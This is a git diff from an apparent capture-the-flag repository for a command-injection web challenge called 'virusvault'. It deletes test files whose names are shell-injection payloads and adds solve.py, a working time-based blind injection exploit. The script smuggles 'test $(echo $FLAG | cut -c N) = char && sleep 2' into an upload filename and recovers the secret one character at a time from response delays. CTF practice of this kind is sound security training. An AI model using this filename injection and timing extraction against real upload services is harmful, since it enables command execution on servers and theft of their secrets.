diff --git "a/web-cmdi/05_virusvault/a `echo \"prova\"`" "b/web-cmdi/05_virusvault/a `echo \"prova\"`"
deleted file mode 100644
index e69de29..0000000
diff --git "a/web-cmdi/05_virusvault/a\"; echo \"prova\";.jpg" "b/web-cmdi/05_virusvault/a\"; echo \"prova\";.jpg"
deleted file mode 100644
index e69de29..0000000
diff --git a/web-cmdi/05_virusvault/a; echo 'a'; .jpg b/web-cmdi/05_virusvault/a; echo 'a'; .jpg
deleted file mode 100644
index e69de29..0000000
diff --git a/web-cmdi/05_virusvault/solve.py b/web-cmdi/05_virusvault/solve.py
new file mode 100644
index 0000000..aba1727
--- /dev/null
+++ b/web-cmdi/05_virusvault/solve.py
@@ -0,0 +1,31 @@
+import string
+import time
+
+import requests
+
+files = {"specimen": ("name.txt; sleep 5", "\r\n", "application/octet-stream")}
+url = "https://552d42c0-a789-405e-82e6-fc37e974d764.offsec.m0lecon.it/scan"
+
+count = 1
+flag = ""
+banned = "/\\"
+while count < 50:
+    for char in string.printable:
+        if char not in banned:
+            # print(f"Testing {char}")
+            files = {
+                "specimen": (
+                    f"name.txt; test $(echo $FLAG | cut -c {count}) = {char} && sleep 2 ",
+                    "\r\n",
+                    "application/octet-stream",
+                )
+            }
+            start = time.perf_counter()
+            response = requests.post(url, files=files)
+            elapsed = time.perf_counter() - start
+            if elapsed > 2:
+                print(f"Found char: {char}")
+                flag += char
+                count = count + 1
+                print(f"Actual flag: {flag}")
+                break
diff --git a/web-cmdi/05_virusvault/test1.txt b/web-cmdi/05_virusvault/test1.txt
deleted file mode 100644
index 597beda..0000000
--- a/web-cmdi/05_virusvault/test1.txt
+++ /dev/null
@@ -1 +0,0 @@
-'a'; $(echo "$FLAG");